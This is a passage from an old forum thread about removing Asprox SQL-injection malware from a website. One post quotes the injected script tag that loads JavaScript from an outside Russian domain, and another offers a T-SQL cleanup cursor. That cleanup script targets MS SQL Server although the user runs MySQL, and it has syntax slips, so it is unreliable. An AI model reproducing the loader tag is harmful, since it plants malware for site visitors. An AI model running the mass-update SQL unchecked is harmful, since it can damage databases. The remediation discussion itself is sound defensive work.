943,633 Members | Top Members by Rank

Web Development > Web Design > HTML and CSS > How to get out malware from website
Ad:
You are currently viewing page 2 of this multi-page discussion thread; Jump to the first page
Permalink
Aug 14th, 2008
0

Re: How to get out malware from website

Report it to the ISP administrator.

If the ISP won't or can't stop it, change ISP services.
Reputation Points: 730
Solved Threads: 181
Nearly a Senior Poster
MidiMagic is offline Offline
3,314 posts
since Jan 2007
Permalink
Aug 24th, 2008
0

Answer: How to get out malware from website

(<script src=http://www.uhwc.ru/js.js></script>)

Hi,
I have had the same problem and was even tagged by Google.

The only way to do it is open your entire web site (I mean all of the files) in whatever software you use, do a search and replace. Change all of your passwords (Server, database, email, etc ...).

Mine has not come back since.

My problem started around Mid August 2008 ... Is Godaddy you hosting company by any chance?
Reputation Points: 10
Solved Threads: 0
Light Poster
123468743867143 is offline Offline
37 posts
since Aug 2008
Permalink
Aug 26th, 2008
0

Re: How to get out malware from website

You have a form on your website that has been exploited. It's part of a very big botnet that automatically finds vunribiltys for asp and injects source into one of your fields. Fix the problem with correct error checking and then edit your database and remove the javascript links.

If you want to find out more infomation about this botnet it's been given the alias asprox.
Reputation Points: 10
Solved Threads: 10
Junior Poster
omol is offline Offline
156 posts
since Jul 2004
Permalink
Aug 26th, 2008
0

Re: How to get out malware from website

I am looking into it right now. I thought my problem was over with. This is scary. I have had inconsistent behavior from MySQL and your input might help me pint point the issue. Thank you.
Reputation Points: 10
Solved Threads: 0
Light Poster
123468743867143 is offline Offline
37 posts
since Aug 2008
Permalink
Aug 26th, 2008
0

Re: How to get out malware from website

Good luck, if you get stuck let me know and i will help further.
Reputation Points: 10
Solved Threads: 10
Junior Poster
omol is offline Offline
156 posts
since Jul 2004
Permalink
Aug 26th, 2008
0

Re: How to get out malware from website

Hi Omol,

Since you asked ... I have been looking into my db (not very good at it though) ... what exactly am I looking for? In the web pages, it was easy to find the intrusive url and delete. What do I search for? I tried asprox, ect ... nothing found.

Thank you.

Rachel
Reputation Points: 10
Solved Threads: 0
Light Poster
123468743867143 is offline Offline
37 posts
since Aug 2008
Permalink
Aug 26th, 2008
0

Re: How to get out malware from website

I would start with the string "js.js". What database tech are you using? MsSql?

Ok i have found some good metrial now.

http://www.networkcloaking.com/ASPROX_Toolkit.pdf
Last edited by omol; Aug 26th, 2008 at 12:55 pm. Reason: Found some info on removal. Too fast for my edit.
Reputation Points: 10
Solved Threads: 10
Junior Poster
omol is offline Offline
156 posts
since Jul 2004
Permalink
Aug 26th, 2008
0

Re: How to get out malware from website

Yes, MySQL. I looked for js.js. in db, not there.

I did remove js.js from the website pages a while back. I checked again, it has not come back.

Something is making my database inconsistent ... Users able to register a new listing one minute but not the other (while the database is still taking their info but not publishing it back to the site).
Last edited by 123468743867143; Aug 26th, 2008 at 12:51 pm.
Reputation Points: 10
Solved Threads: 0
Light Poster
123468743867143 is offline Offline
37 posts
since Aug 2008
Permalink
Aug 26th, 2008
0

Re: How to get out malware from website

Sorry i should not edit posts.

Heres the fix. Replace infected_table with the table name that is infected on your site.

HTML and CSS Syntax (Toggle Plain Text)
  1. use <infected_table>
  2. DECLARE @T varchar(255), @C varchar(255);
  3. DECLARE Table_Cursor CURSOR FOR
  4. SELECT a.name, b.name
  5. FROM sysobjects a, syscolumns b
  6. WHERE a.id = b.id AND a.xtype = 'u' AND
  7. (b.xtype = 99 OR
  8. b.xtype = 35 OR
  9. b.xtype = 231 OR
  10. b.xtype = 167);
  11. OPEN Table_Cursor;
  12. FETCH NEXT FROM Table_Cursor INTO @T, @C;
  13. WHILE (@@FETCH_STATUS = 0) BEGIN
  14. EXEC(
  15. 'update ['+@T+'] set ['+@C+'] = left(
  16. convert(varchar(8000), ['+@C+']),
  17. len(convert(varchar(8000), ['+@C+'])) - 6 –
  18. patindex(''%tpircs<%'',
  19. reverse(convert(varchar(8000), ['+@C+'])))
  20. )
  21. where ['+@C+'] like ''%<script%</script>'''
  22. );
  23. FETCH NEXT FROM Table_Cursor INTO @T, @C;
  24. END;
  25. CLOSE Table_Cursor;
  26. DEALLOCATE Table_Cursor;

If you need to know more, or want more infomation have a look at.

http://www.networkcloaking.com/ASPROX_Toolkit.pdf
Reputation Points: 10
Solved Threads: 10
Junior Poster
omol is offline Offline
156 posts
since Jul 2004
Permalink
Aug 26th, 2008
0

Re: How to get out malware from website

Thank you very much. you are great.
Reputation Points: 10
Solved Threads: 0
Light Poster
123468743867143 is offline Offline
37 posts
since Aug 2008

This thread is more than three months old

No one has posted to this discussion for at least three months. Please let old threads die and do not reply to them unless you feel you have something new and valuable to contribute that absolutely must be added to make the discussion complete. Otherwise, please start a new thread in this forum instead.
Message:
Previous Thread in HTML and CSS Forum Timeline: Is there a difference?
Next Thread in HTML and CSS Forum Timeline: How can i make a text blink





About Us | Contact Us | Advertise | Acceptable Use Policy
Forum Index | Build Custom RSS Feed


Follow us on Twitter


© 2011 DaniWeb® LLC